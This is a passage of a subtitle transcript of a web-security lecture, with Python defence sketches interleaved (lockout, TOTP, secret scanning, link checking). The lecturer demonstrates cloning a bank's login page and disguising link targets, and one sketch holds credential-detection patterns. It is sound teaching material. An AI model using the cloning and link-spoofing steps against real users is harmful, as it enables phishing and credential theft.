1
00:00:00,000 --> 00:00:03,920
[MUSIC PLAYING]

2
00:00:03,920 --> 00:00:15,647


3
00:00:15,647 --> 00:00:18,980
BRIAN YU: Welcome back, everyone, to Web
Programming with Python and JavaScript,

4
00:00:18,980 --> 00:00:20,510
and welcome to our final lecture.

5
00:00:20,510 --> 00:00:23,180
So we've talked about a lot over
the course of Web Programming

6
00:00:23,180 --> 00:00:24,305
with Python and JavaScript.

7
00:00:24,305 --> 00:00:26,840
Everything from version
control to designing

8
00:00:26,840 --> 00:00:29,420
what a web page looks
like using HTML and CSS,

9
00:00:29,420 --> 00:00:32,299
and then moving into programming
languages like Python and JavaScript

10
00:00:32,299 --> 00:00:34,965
that are used on the server side
and on the client side in order

11
00:00:34,965 --> 00:00:37,180
to build and design web applications.

12
00:00:37,180 --> 00:00:39,110
And where I thought
we'd conclude today is

13
00:00:39,110 --> 00:00:41,630
by talking a little bit about
security, about making sure

14
00:00:41,630 --> 00:00:43,760
that our web applications
are secure, thinking

15
00:00:43,760 --> 00:00:46,250
about what sorts of
security vulnerabilities

16
00:00:46,250 --> 00:00:48,629
can come about when we're
thinking about web applications

17
00:00:48,629 --> 00:00:50,420
and deploying them to
the internet, and how

18
00:00:50,420 --> 00:00:53,630
we can best defend against
those potential vulnerabilities.

19
00:00:53,630 --> 00:00:56,644
And in doing so, we'll be taking
a look back at all of the topics

20
00:00:56,644 --> 00:00:58,560
that we've talked about
so far in this course,

21
00:00:58,560 --> 00:01:03,290
going from Git to HTML, to looking
at Flask, SQL, and API design,

22
00:01:03,290 --> 00:01:07,130
thinking about programming in JavaScript,
using Django as a web framework later on,

23
00:01:07,130 --> 00:01:10,790
testing with continuous integration
and continuous deployment, in addition

24
00:01:10,790 --> 00:01:11,720
to scalability.

25
00:01:11,720 --> 00:01:14,570
We'll look through all of
these past topics one at a time,

26
00:01:14,570 --> 00:01:17,540
and think about where
security vulnerabilities might

27
00:01:17,540 --> 00:01:20,570
arise in any of these potential
areas, and how we might start

28
00:01:20,570 --> 00:01:22,220
to think about defending against them.

29
00:01:22,220 --> 00:01:24,470
Some of these things will
be things we have alluded to

30
00:01:24,470 --> 00:01:27,899
or talked about a little bit over
the course of the semester so far.

31
00:01:27,899 --> 00:01:29,690
But today, we'll really
take an opportunity

32
00:01:29,690 --> 00:01:31,940
to look at all of these
topics in a little more depth

33
00:01:31,940 --> 00:01:36,080
and think about what security
vulnerabilities could come up

34
00:01:36,080 --> 00:01:40,084
in the process of dealing with any
of these areas within a web program.

35
00:01:40,084 --> 00:01:43,250
So where I thought we'd start is at the
very beginning by talking about Git.

36
00:01:43,250 --> 00:01:46,280
So we began the semester by
talking about version control using

37
00:01:46,280 --> 00:01:49,037
Git and GitHub, in particular,
as a way of hosting code

38
00:01:49,037 --> 00:01:51,620
online in a place where different
people from around the world

39
00:01:51,620 --> 00:01:56,250
can have shared access to a repository
of code, where they can push code to it

40
00:01:56,250 --> 00:01:59,150
or pull code from it, using
different branches and features

41
00:01:59,150 --> 00:02:01,880
like pull requests in order
to better collaborate on code.

42
00:02:01,880 --> 00:02:05,594
And GitHub is really built upon
this idea of open-source software,

43
00:02:05,594 --> 00:02:07,760
of software where the code
isn't hidden from people,

44
00:02:07,760 --> 00:02:11,180
but is potentially available to anyone
who wants to look at that code,

45
00:02:11,180 --> 00:02:15,260
to see that code, and if they want to,
propose pull requests or suggestions

46
00:02:15,260 --> 00:02:16,820
or changes to that code.

47
00:02:16,820 --> 00:02:20,120
And so let's think about open-source
software just as a high-level idea

48
00:02:20,120 --> 00:02:21,050
right now.

49
00:02:21,050 --> 00:02:24,140
What are some security benefits
of open-source software,

50
00:02:24,140 --> 00:02:27,020
and what are some potential
security concerns that might arise?

51
00:02:27,020 --> 00:02:30,810


52
00:02:30,810 --> 00:02:31,310
Sure.

53
00:02:31,310 --> 00:02:33,884
AUDIENCE: That lots of people
can see it on both sides.

54
00:02:33,884 --> 00:02:34,550
BRIAN YU: Great.

55
00:02:34,550 --> 00:02:35,780
Lots of people can see it--

56
00:02:35,780 --> 00:02:37,190
AUDIENCE: But they'll fix bugs.

57
00:02:37,190 --> 00:02:37,430
BRIAN YU: Right.

58
00:02:37,430 --> 00:02:39,200
And that has implications
on both sides of things

59
00:02:39,200 --> 00:02:41,765
when it comes to bugs, which means that
when you have a lot of different eyes

60
00:02:41,765 --> 00:02:44,810
all looking at the same code, there's
a possibility that someone else might

61
00:02:44,810 --> 00:02:47,460
catch a bug that you missed when
you were writing the software.

62
00:02:47,460 --> 00:02:49,209
But on the flip side
of course, if someone

63
00:02:49,209 --> 00:02:51,950
is able to spot a vulnerability
in your code by reading it

64
00:02:51,950 --> 00:02:55,158
and they don't tell you about it or any
of the other maintainers of the code,

65
00:02:55,158 --> 00:02:57,710
now they're potentially able
to take advantage of a security

66
00:02:57,710 --> 00:03:00,440
exploit in your code, something
you didn't see coming before.

67
00:03:00,440 --> 00:03:02,690
And something that they wouldn't
have otherwise known about

68
00:03:02,690 --> 00:03:04,106
had the code not been open-source.

69
00:03:04,106 --> 00:03:06,266
So open-source software
in that sense can sort of

70
00:03:06,266 --> 00:03:09,515
be a double-edged sword where you have
to be careful that with a lot of people

71
00:03:09,515 --> 00:03:12,680
all looking at the code, there's
potential both for a lot of people

72
00:03:12,680 --> 00:03:15,470
to be able to help you in
finding bugs and making security

73
00:03:15,470 --> 00:03:17,570
improvements to your
code, but also for others

74
00:03:17,570 --> 00:03:19,540
to spot vulnerabilities and exploit them.

75
00:03:19,540 --> 00:03:21,500
And over the course of
today, we'll be looking

76
00:03:21,500 --> 00:03:25,430
at some of those potential
vulnerabilities that can exist inside

77
00:03:25,430 --> 00:03:28,940
of our web programs and
taking a look at how we might

78
00:03:28,940 --> 00:03:31,820
start to try to defend against them.

79
00:03:31,820 --> 00:03:33,890
What other security
considerations might come up

80
00:03:33,890 --> 00:03:36,150
when we're using Git and
GitHub, in particular?

81
00:03:36,150 --> 00:03:38,150
If we're hosting our
code online, you might

82
00:03:38,150 --> 00:03:41,150
think that, to avoid the risks of open-source
software, we might be able to just

83
00:03:41,150 --> 00:03:42,544
make our repositories private.

84
00:03:42,544 --> 00:03:44,960
So GitHub has the option of
making repositories private so

85
00:03:44,960 --> 00:03:47,520
that only certain people have
access to your repository.

86
00:03:47,520 --> 00:03:49,770
So not everyone can potentially see it.

87
00:03:49,770 --> 00:03:51,850
But what dangers still
might arise there?

88
00:03:51,850 --> 00:03:55,620


89
00:03:55,620 --> 00:03:58,871
Multiple possibilities.

90
00:03:58,871 --> 00:03:59,370
Sure?

91
00:03:59,370 --> 00:04:01,595
AUDIENCE: Someone had access
to your GitHub account.

92
00:04:01,595 --> 00:04:02,220
BRIAN YU: Sure.

93
00:04:02,220 --> 00:04:04,094
If someone had access
to your GitHub account,

94
00:04:04,094 --> 00:04:05,840
they'd have all of your code, since it's stored online.

95
00:04:05,840 --> 00:04:08,000
So if some
enterprising hacker is

96
00:04:08,000 --> 00:04:09,840
able to somehow gain
access to your account,

97
00:04:09,840 --> 00:04:11,700
then they might be able
to take advantage of that.

98
00:04:11,700 --> 00:04:13,640
And so for a long time,
most websites have

99
00:04:13,640 --> 00:04:15,920
operated under a model
of username and password

100
00:04:15,920 --> 00:04:18,079
being the way that you
log in to a website.

101
00:04:18,079 --> 00:04:21,500
And increasingly, there are
ways that hackers try to bypass

102
00:04:21,500 --> 00:04:23,270
that by trying to
guess passwords, either

103
00:04:23,270 --> 00:04:27,870
by guessing frequently used
passwords, or by just trying

104
00:04:27,870 --> 00:04:29,870
many, many different
passwords, trying thousands

105
00:04:29,870 --> 00:04:31,786
or millions of different
password combinations

106
00:04:31,786 --> 00:04:34,700
in the hopes of at least getting
access to some person's account.

107
00:04:34,700 --> 00:04:37,970
And so if hackers are doing that, trying
to guess at passwords very quickly

108
00:04:37,970 --> 00:04:40,250
in order to try to gain
access to accounts, what can

109
00:04:40,250 --> 00:04:43,686
web applications do in order
to defend against that?

110
00:04:43,686 --> 00:04:45,560
In order to defend
against hackers that might

111
00:04:45,560 --> 00:04:49,620
be trying to get into other
users' accounts without authorization.

112
00:04:49,620 --> 00:04:50,120
Sure?

113
00:04:50,120 --> 00:04:53,620
AUDIENCE: They could do things
like only so many misses.

114
00:04:53,620 --> 00:04:57,620
You can only have so many wrong or
perhaps another kind of authentication,

115
00:04:57,620 --> 00:04:58,240
also.

116
00:04:58,240 --> 00:04:58,580
BRIAN YU: Great.

117
00:04:58,580 --> 00:04:59,960
So different possibilities exist.

118
00:04:59,960 --> 00:05:02,480
One might be placing a
limit on the number of times

119
00:05:02,480 --> 00:05:04,340
you can try to log in
in any period of time.

120
00:05:04,340 --> 00:05:07,230
Maybe you can only log in, or
attempt to log in, five times,

121
00:05:07,230 --> 00:05:08,450
and if you miss five
times, then you have

122
00:05:08,450 --> 00:05:11,710
to wait potentially an hour until you're
able to log in again, for instance.

123
00:05:11,710 --> 00:05:13,100
So many applications do that.
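A minimal sketch of the lockout idea just described, assuming an in-memory store and the lecture's illustrative numbers (five failed attempts, then a one-hour wait). The names `LoginThrottle` and `attempt_login` are hypothetical; a real application would keep this state in a shared database or cache rather than in one process's memory.

```python
import time
from collections import defaultdict


class LoginThrottle:
    """Hypothetical helper: lock an account after too many failed logins."""

    def __init__(self, max_failures=5, lockout_seconds=3600, clock=time.monotonic):
        self.max_failures = max_failures
        self.lockout_seconds = lockout_seconds
        self.clock = clock                 # injectable so the behavior can be tested
        self.failures = defaultdict(int)   # username -> consecutive failed attempts
        self.locked_until = {}             # username -> time when the lock expires

    def is_locked(self, username):
        until = self.locked_until.get(username)
        if until is None:
            return False
        if self.clock() >= until:
            # The lock has expired: clear it and start counting afresh.
            del self.locked_until[username]
            self.failures[username] = 0
            return False
        return True

    def record_failure(self, username):
        self.failures[username] += 1
        if self.failures[username] >= self.max_failures:
            self.locked_until[username] = self.clock() + self.lockout_seconds

    def record_success(self, username):
        self.failures[username] = 0


def attempt_login(throttle, username, password, check_password):
    """Return True only if the account is unlocked and the password is correct."""
    if throttle.is_locked(username):
        return False  # refuse without even checking the password
    if check_password(username, password):
        throttle.record_success(username)
        return True
    throttle.record_failure(username)
    return False


# Usage with a fake clock so the hour can "pass" instantly.
now = [0.0]
throttle = LoginThrottle(clock=lambda: now[0])
check = lambda user, pw: pw == "correct horse"
for _ in range(5):
    attempt_login(throttle, "alice", "guess", check)
print(attempt_login(throttle, "alice", "correct horse", check))  # False: still locked
now[0] += 3600
print(attempt_login(throttle, "alice", "correct horse", check))  # True: lock expired
```

Because a locked account is refused before the password is even checked, an attacker guessing at full speed gets at most five tries per hour per account.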

124
00:05:13,100 --> 00:05:15,900
And then you also talked about
other authentication systems.

125
00:05:15,900 --> 00:05:20,970
So what other authentication
systems could there be?

126
00:05:20,970 --> 00:05:24,372
AUDIENCE: So like the thing where
you get a code pushed to your phone

127
00:05:24,372 --> 00:05:24,974
somehow.

128
00:05:24,974 --> 00:05:25,640
BRIAN YU: Great.

129
00:05:25,640 --> 00:05:27,840
So an increasingly popular
form of authentication

130
00:05:27,840 --> 00:05:29,660
now is two-factor authentication.

131
00:05:29,660 --> 00:05:32,744
The idea that it's not enough just to
log in with a username and password,

132
00:05:32,744 --> 00:05:35,410
but you might also want to log
in with something else, something

133
00:05:35,410 --> 00:05:37,910
that is physically on you,
like a phone for instance.

134
00:05:37,910 --> 00:05:40,250
Where, after you type in
your username and password,

135
00:05:40,250 --> 00:05:43,250
a code is texted to your phone,
or you use an app on your phone

136
00:05:43,250 --> 00:05:46,440
in order to get a special code, and
then you have to type in that code.

137
00:05:46,440 --> 00:05:49,580
So that even if an attacker
potentially knows your password,

138
00:05:49,580 --> 00:05:52,220
either by hacking into some
database and finding the password

139
00:05:52,220 --> 00:05:54,260
or just by a lucky
guess, they're still

140
00:05:54,260 --> 00:05:56,300
not going to be able to access
your account because they still

141
00:05:56,300 --> 00:05:59,460
have this added step of having to go
through some two-factor authentication

142
00:05:59,460 --> 00:05:59,960
code.

143
00:05:59,960 --> 00:06:02,510
Where they now need to type
in a particular code that

144
00:06:02,510 --> 00:06:05,180
is only available to someone
that physically owns the device,

145
00:06:05,180 --> 00:06:06,020
like a phone.

146
00:06:06,020 --> 00:06:08,680
And that can also help to
improve security as well.
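Authenticator apps commonly produce these codes with time-based one-time passwords (TOTP, RFC 6238): the site and the phone share a secret, and each derives a short code from that secret plus the current 30-second time window. Below is a minimal standard-library sketch assuming the common defaults (HMAC-SHA1, 6 digits, 30-second step); it is not necessarily what any particular site uses, and a production version would also tolerate small clock drift and store the shared secret securely.

```python
import hashlib
import hmac
import struct
import time
from typing import Optional


def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """HMAC-based one-time password (RFC 4226)."""
    message = struct.pack(">Q", counter)  # counter as an 8-byte big-endian integer
    digest = hmac.new(secret, message, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F  # "dynamic truncation": low 4 bits pick a 4-byte window
    value = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(value % 10 ** digits).zfill(digits)


def totp(secret: bytes, at: Optional[float] = None, step: int = 30, digits: int = 6) -> str:
    """Time-based one-time password (RFC 6238): HOTP keyed on the current time step."""
    if at is None:
        at = time.time()
    return hotp(secret, int(at // step), digits)


def verify_second_factor(secret: bytes, submitted: str, at: Optional[float] = None) -> bool:
    """Accept the code only if it matches the current window (no drift tolerance here)."""
    # compare_digest avoids leaking how many leading characters matched via timing.
    return hmac.compare_digest(totp(secret, at), submitted)


# The test secret used in the RFCs (ASCII "12345678901234567890").
SECRET = b"12345678901234567890"
print(hotp(SECRET, 0))                # 755224
print(totp(SECRET, at=59, digits=8))  # 94287082
```

The password proves something you know; the code proves you hold the device that has the secret, which is why a stolen password alone isn't enough.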

147
00:06:08,680 --> 00:06:12,030
And so GitHub, for instance, has
an opt-in two-factor authentication

148
00:06:12,030 --> 00:06:13,849
where you can enable
that for your account

149
00:06:13,849 --> 00:06:15,890
in order to make your
GitHub account more secure.

150
00:06:15,890 --> 00:06:18,860
And other websites are increasingly
offering two-factor authentication

151
00:06:18,860 --> 00:06:22,430
as well, as just an additional means
of trying to secure your accounts.

152
00:06:22,430 --> 00:06:27,420
And web applications are beginning to
use that as a security measure as well.

153
00:06:27,420 --> 00:06:30,770
But let's think more broadly, not just
about GitHub, but about Git in general,

154
00:06:30,770 --> 00:06:33,080
and this idea of version
control and making changes

155
00:06:33,080 --> 00:06:35,060
and committing and saving those changes.

156
00:06:35,060 --> 00:06:38,865
And when we're thinking about
pushing our commits to the internet,

157
00:06:38,865 --> 00:06:41,240
taking our changes that we've
made in a Git repository

158
00:06:41,240 --> 00:06:43,280
and pushing them online,
we want to be careful

159
00:06:43,280 --> 00:06:46,670
that sensitive information
like a password or an access

160
00:06:46,670 --> 00:06:50,222
token for some service doesn't
end up inside of a repository.

161
00:06:50,222 --> 00:06:53,180
Because if it does, and it gets
pushed online, then regardless of whether

162
00:06:53,180 --> 00:06:56,346
that repository is public or not,
there's a potential that other people

163
00:06:56,346 --> 00:07:00,020
might be able to see that access
token when they probably shouldn't.
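One common way to keep a token out of the repository in the first place is to read it from an environment variable at runtime instead of writing it into a source file. A minimal sketch; the variable name `API_TOKEN` and the helper `get_api_token` are hypothetical.

```python
import os


def get_api_token() -> str:
    """Read a credential from the environment instead of hard-coding it.

    API_TOKEN is a hypothetical variable name: set it in your shell or
    deployment configuration, never in a file that gets committed.
    """
    token = os.environ.get("API_TOKEN")
    if not token:
        raise RuntimeError("API_TOKEN is not set; refusing to start without it")
    return token
```

If you keep local values in a file such as `.env`, listing that file in `.gitignore` helps make sure it never ends up in a commit.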

164
00:07:00,020 --> 00:07:03,710
And so imagine a situation where
you're working on a repository.

165
00:07:03,710 --> 00:07:07,430
And you've made some commits
and maybe accidentally, you

166
00:07:07,430 --> 00:07:09,410
put a password or some
access token that you

167
00:07:09,410 --> 00:07:12,650
didn't mean to inside of one of the
files, and you commit that file.

168
00:07:12,650 --> 00:07:15,650
And so credentials have now been
exposed in one of the commits inside

169
00:07:15,650 --> 00:07:16,744
of your repository.

170
00:07:16,744 --> 00:07:19,160
And then later on down the
line, you realize that mistake.

171
00:07:19,160 --> 00:07:21,860
You realize, oh, wait a minute, I put
credentials inside that repository

172
00:07:21,860 --> 00:07:23,450
when I probably shouldn't have.

173
00:07:23,450 --> 00:07:26,330
And you make another commit removing
those credentials from the file.

174
00:07:26,330 --> 00:07:28,770
So you add another commit,
removing those credentials.

175
00:07:28,770 --> 00:07:33,110
And now those credentials are no
longer in the head of the repository.

176
00:07:33,110 --> 00:07:35,540
You've taken them out, you've
committed that removal.

177
00:07:35,540 --> 00:07:38,191
Is that secure?

178
00:07:38,191 --> 00:07:38,690
No.

179
00:07:38,690 --> 00:07:39,689
I see people shaking their heads.

180
00:07:39,689 --> 00:07:40,410
Why not?

181
00:07:40,410 --> 00:07:42,560
AUDIENCE: Because you
can see all the history.

182
00:07:42,560 --> 00:07:42,830
BRIAN YU: Great.

183
00:07:42,830 --> 00:07:45,860
Because of Git's version control system,
the fact that it's saving every time

184
00:07:45,860 --> 00:07:47,870
you make a commit, it's
saving your entire history.

185
00:07:47,870 --> 00:07:50,510
Which means that even though--
if you look at all of your files

186
00:07:50,510 --> 00:07:51,800
in their current state now--

187
00:07:51,800 --> 00:07:55,340
those credentials are not there, anyone
who has access to that repository

188
00:07:55,340 --> 00:07:57,230
has access to the full
history of commits.

189
00:07:57,230 --> 00:07:59,950
They can go back and look at
your previous commit messages,

190
00:07:59,950 --> 00:08:03,200
the previous files you've changed, and
what your files looked like at every stage

191
00:08:03,200 --> 00:08:04,200
along the way.

192
00:08:04,200 --> 00:08:07,610
And so once you've exposed
those credentials, now

193
00:08:07,610 --> 00:08:09,470
even if you make another
commit after that,

194
00:08:09,470 --> 00:08:11,250
those credentials are
still going to be there.

195
00:08:11,250 --> 00:08:12,666
And so there are ways around this.

196
00:08:12,666 --> 00:08:16,610
There are ways of reverting back to a
previous commit and pruning away all

197
00:08:16,610 --> 00:08:20,270
the extra commits, and then what we
would call force pushing those commits

198
00:08:20,270 --> 00:08:21,920
back to GitHub in order to update it.

199
00:08:21,920 --> 00:08:24,404
But generally, once you've
pushed code to GitHub,

200
00:08:24,404 --> 00:08:27,320
you might want to imagine all of
that code as potentially compromised.

201
00:08:27,320 --> 00:08:29,570
So if you had passwords
or security credentials

202
00:08:29,570 --> 00:08:32,270
or other keys inside of your
repository that you accidentally

203
00:08:32,270 --> 00:08:35,669
pushed to GitHub, it's probably a good idea
to just revoke those credentials

204
00:08:35,669 --> 00:08:38,510
altogether and
get new ones, because there

205
00:08:38,510 --> 00:08:41,419
is the potential that those
credentials could be compromised once

206
00:08:41,419 --> 00:08:42,606
they're pushed.
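Because the history keeps every version, it can be worth scanning the whole history, not just the current files, for anything that looks like a credential. A rough sketch that reads the text printed by `git log -p` (for instance, lines from `sys.stdin` when piped) and flags added lines matching a few patterns. The patterns are illustrative assumptions and will miss many real secret formats; dedicated secret-scanning tools go much further.

```python
import re

# Illustrative patterns only (assumptions, not an exhaustive list).
SUSPICIOUS = [
    re.compile(r"(?i)\b(password|passwd|secret|token|api_key)\b\s*[:=]\s*[\"'][^\"']+[\"']"),
    re.compile(r"\bAKIA[0-9A-Z]{16}\b"),  # the shape of an AWS access key ID
]


def scan_git_log(lines):
    """Yield (commit, line) pairs for added lines that look like credentials."""
    commit = None
    for line in lines:
        if line.startswith("commit "):
            commit = line.split()[1]
        elif line.startswith("+") and not line.startswith("+++"):
            if any(pattern.search(line) for pattern in SUSPICIOUS):
                yield commit, line[1:].strip()


# A key added in one commit and "removed" in the next is still found.
sample_log = """\
commit 3f2a9c1
Author: Example <dev@example.com>

    Add config

diff --git a/config.py b/config.py
--- a/config.py
+++ b/config.py
@@ -0,0 +1 @@
+API_KEY = "not-a-real-key"
commit 8b71d04
Author: Example <dev@example.com>

    Remove key

diff --git a/config.py b/config.py
--- a/config.py
+++ b/config.py
@@ -1 +0,0 @@
-API_KEY = "not-a-real-key"
"""
for commit, text in scan_git_log(sample_log.splitlines()):
    print(commit, text)
```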

207
00:08:42,606 --> 00:08:44,480
And so those are some
security considerations

208
00:08:44,480 --> 00:08:47,600
that might come about when we're
thinking about Git and GitHub.

209
00:08:47,600 --> 00:08:51,184
But let's move on now to actually
writing code, and take a look at HTML.

210
00:08:51,184 --> 00:08:54,100
So HTML, remember, we were using at
the very beginning of this semester

211
00:08:54,100 --> 00:08:56,990
and all throughout the semester
in order to design web pages

212
00:08:56,990 --> 00:09:00,920
which just consisted of tags, where
we had our body tags and different tags

213
00:09:00,920 --> 00:09:03,080
for creating lists or
creating forms or creating

214
00:09:03,080 --> 00:09:04,980
buttons and so on and so forth.

215
00:09:04,980 --> 00:09:09,270
What security vulnerabilities might
come about from just purely HTML?

216
00:09:09,270 --> 00:09:13,580
Or how might HTML be used to
trick users into doing something

217
00:09:13,580 --> 00:09:17,550
that a malicious attacker
might want them to do?

218
00:09:17,550 --> 00:09:18,050
Yeah?

219
00:09:18,050 --> 00:09:24,284
AUDIENCE: In browser, we can see
HTML by going to [INAUDIBLE].

220
00:09:24,284 --> 00:09:24,950
BRIAN YU: Great.

221
00:09:24,950 --> 00:09:28,010
Inside of a browser, for instance,
you can inspect a website,

222
00:09:28,010 --> 00:09:29,870
and you can take a look
at all of the code.

223
00:09:29,870 --> 00:09:31,590
And so what are the
implications of that?

224
00:09:31,590 --> 00:09:35,390
Well, that means that if I wanted to, I
could, for instance, go into my browser

225
00:09:35,390 --> 00:09:38,574
and go to, I don't know,
bankofamerica.com for instance.

226
00:09:38,574 --> 00:09:41,240
And I could pull up, OK, here's
Bank of America's website, which

227
00:09:41,240 --> 00:09:44,570
is really just HTML that's
been rendered onto my screen.

228
00:09:44,570 --> 00:09:47,540
And if I wanted to know what code
is Bank of America using in order

229
00:09:47,540 --> 00:09:50,090
to make any of this stuff
happen, I could reasonably

230
00:09:50,090 --> 00:09:54,060
control click on the site,
click on View Page Source,

231
00:09:54,060 --> 00:09:57,464
and what that pulls up for
me is a whole bunch of HTML.

232
00:09:57,464 --> 00:10:00,380
It's a whole bunch of it, and I don't
really know what all of it does.

233
00:10:00,380 --> 00:10:03,530
But if I just take it all
and copy it to my clipboard,

234
00:10:03,530 --> 00:10:07,670
and I go into a text editor
and create a new file--

235
00:10:07,670 --> 00:10:10,670
I'll call it bank.html--

236
00:10:10,670 --> 00:10:13,310
and I'm just going to
paste in all of that code

237
00:10:13,310 --> 00:10:15,530
that I just copied off
Bank of America's website.

238
00:10:15,530 --> 00:10:18,405
I didn't have to write any of it,
just copied it straight from there.

239
00:10:18,405 --> 00:10:22,560
Now if I go ahead and open
bank.html, this file I just created,

240
00:10:22,560 --> 00:10:24,980
now I've effectively recreated
Bank of America's website

241
00:10:24,980 --> 00:10:26,540
just by copying their HTML.

242
00:10:26,540 --> 00:10:29,810
And if I now host this from my
own web server, for instance,

243
00:10:29,810 --> 00:10:32,907
I might be able to trick unsuspecting
users into thinking that this

244
00:10:32,907 --> 00:10:34,490
is actually Bank of America's website.

245
00:10:34,490 --> 00:10:37,615
Because just at first glance, it looks
quite reasonably like the same thing

246
00:10:37,615 --> 00:10:39,530
because it's the exact same HTML.

247
00:10:39,530 --> 00:10:41,420
And if I'm really
enterprising, I can think

248
00:10:41,420 --> 00:10:43,753
about actually trying to make
modifications to this code

249
00:10:43,753 --> 00:10:48,520
in order to be even better able to
try to maliciously take advantage

250
00:10:48,520 --> 00:10:51,020
of a user who might unsuspectingly
be arriving at this site,

251
00:10:51,020 --> 00:10:54,650
not realizing that it's not the
actual Bank of America website.

252
00:10:54,650 --> 00:10:57,830
I might, for instance, take
this Forgot Passcode button

253
00:10:57,830 --> 00:11:00,320
down here-- which is
probably a link to some page

254
00:11:00,320 --> 00:11:02,990
where they might type in their
email address or try and type

255
00:11:02,990 --> 00:11:05,420
in some new passcode that
they want for instance--

256
00:11:05,420 --> 00:11:08,750
and I might just take this
HTML file, and I'll just

257
00:11:08,750 --> 00:11:12,440
search for forgot passcode.

258
00:11:12,440 --> 00:11:13,520
And OK, here it is.

259
00:11:13,520 --> 00:11:14,840
Here's forgot passcode.

260
00:11:14,840 --> 00:11:19,950
And if we notice, it's located
inside of an a tag-- an anchor tag--

261
00:11:19,950 --> 00:11:23,270
which has this href
attribute, which is going

262
00:11:23,270 --> 00:11:26,390
to be where the user is linked
to if they were to ever click on

263
00:11:26,390 --> 00:11:28,260
that I forgot my password button.

264
00:11:28,260 --> 00:11:31,940
And so if I take this link, this
secure.bankofamerica.com/login

265
00:11:31,940 --> 00:11:36,720
something, and instead of linking
to that, link to, I don't know,

266
00:11:36,720 --> 00:11:41,600
https://cs50.github.io/web or whatever
other page I want to redirect the user

267
00:11:41,600 --> 00:11:42,740
to.

268
00:11:42,740 --> 00:11:46,479
Now if I refresh the site, it looks like
Bank of America's website once again,

269
00:11:46,479 --> 00:11:49,520
but when they go over here and they
try and click on this Forgot Passcode

270
00:11:49,520 --> 00:11:52,566
button, now they're taken to
our website or whatever website

271
00:11:52,566 --> 00:11:53,690
I want to take the user to.

272
00:11:53,690 --> 00:11:57,350
I can modify the HTML that they have
in order to direct them anywhere.

273
00:11:57,350 --> 00:12:00,230
And so that's sort of
one of the common ways

274
00:12:00,230 --> 00:12:03,560
that attackers are able to use
HTML to try and trick users

275
00:12:03,560 --> 00:12:04,689
into doing something.

276
00:12:04,689 --> 00:12:06,980
In particular, noting the
fact that you can take a link

277
00:12:06,980 --> 00:12:08,930
and make it look like it's
going anywhere, but really

278
00:12:08,930 --> 00:12:10,638
take the user to
somewhere that you want.

279
00:12:10,638 --> 00:12:15,620
I can have something like this where
if I just have an a tag with href equals url1--

280
00:12:15,620 --> 00:12:19,130
where url1 is where I want
the user to be taken to

281
00:12:19,130 --> 00:12:23,640
and url2 is just the text
that appears to the user--

282
00:12:23,640 --> 00:12:25,880
then the user might
reasonably be tricked

283
00:12:25,880 --> 00:12:30,390
into thinking that they're going to url2
when in reality, they're going to url1.

284
00:12:30,390 --> 00:12:36,970
And so a simple example of that
might be inside of link.html here.

285
00:12:36,970 --> 00:12:38,750
We're in link.html.

286
00:12:38,750 --> 00:12:42,140
It's a very simple HTML website,
where inside of my body tag,

287
00:12:42,140 --> 00:12:44,870
I have an anchor tag, which
is just going to be a link.

288
00:12:44,870 --> 00:12:48,870
And the href of that link is this
course's website, for instance.

289
00:12:48,870 --> 00:12:53,870
But in between the a tags, what I
have is just google.com, for instance.

290
00:12:53,870 --> 00:12:58,460
And so what that means is that
if I were to open up link.html,

291
00:12:58,460 --> 00:13:02,150
for instance, what the user
sees is something like this,

292
00:13:02,150 --> 00:13:03,890
a page that just has a link to Google.

293
00:13:03,890 --> 00:13:05,690
And they might reasonably think
that clicking on that link

294
00:13:05,690 --> 00:13:08,606
should take them to Google when in
fact, when they click on that link,

295
00:13:08,606 --> 00:13:10,950
they're taken here instead,
to the course web page.

296
00:13:10,950 --> 00:13:12,866
And so you can imagine
how this might actually

297
00:13:12,866 --> 00:13:15,520
be used in order
to create potential exploits.

298
00:13:15,520 --> 00:13:18,470
So I could, for instance,
take Bank of America's URL,

299
00:13:18,470 --> 00:13:22,910
go to link.html, and say, all
right, we'll put Bank of America here,

300
00:13:22,910 --> 00:13:26,640
and in the href, instead
put bank.html, for instance,

301
00:13:26,640 --> 00:13:31,550
which is the link to the file that I
created copying Bank of America's code.

302
00:13:31,550 --> 00:13:37,490
Now suddenly, when I
open up link.html, I

303
00:13:37,490 --> 00:13:40,190
get a link that looks like it
is linking to Bank of America.

304
00:13:40,190 --> 00:13:41,981
I click on that link,
and I get a page that

305
00:13:41,981 --> 00:13:43,730
looks like Bank of America's website.

306
00:13:43,730 --> 00:13:46,855
And if I click on forgot my passcode,
now I'm redirected to some other site

307
00:13:46,855 --> 00:13:47,390
altogether.

308
00:13:47,390 --> 00:13:51,540
And so these are common
ways that exploits

309
00:13:51,540 --> 00:13:54,290
are able to happen by taking
advantage of security vulnerabilities

310
00:13:54,290 --> 00:13:57,350
like this where we're really just
relying on people not being aware

311
00:13:57,350 --> 00:13:59,510
of the fact that clicking
on a link might take them

312
00:13:59,510 --> 00:14:01,477
somewhere different altogether.

313
00:14:01,477 --> 00:14:03,560
And so how do you defend
against things like this?

314
00:14:03,560 --> 00:14:05,210
Well, one good strategy
from the user end

315
00:14:05,210 --> 00:14:07,668
is just to be careful about
the links that you're clicking.

316
00:14:07,668 --> 00:14:10,910
In Chrome, for instance, if you hover
over a link, down in the lower left,

317
00:14:10,910 --> 00:14:12,279
you can see this--

318
00:14:12,279 --> 00:14:14,570
it's in small text, so you
might not be able to see it,

319
00:14:14,570 --> 00:14:17,519
but this is the actual URL that
this link is going to take you to.

320
00:14:17,519 --> 00:14:19,310
So you can't always
trust what the text is.

321
00:14:19,310 --> 00:14:22,643
You might want to look very carefully at
where that link is actually taking you.
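The same check can be automated. A rough sketch using Python's built-in `html.parser`: it collects each link's `href` and visible text, and flags links whose text looks like a domain that doesn't match the host the `href` actually points to. The "looks like a domain" test (contains a dot, no spaces) is an assumption for illustration, so a link whose text is just "Bank of America" is not checked at all.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs for every <a> tag."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:  # only keep text that sits inside a link
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def _host(url):
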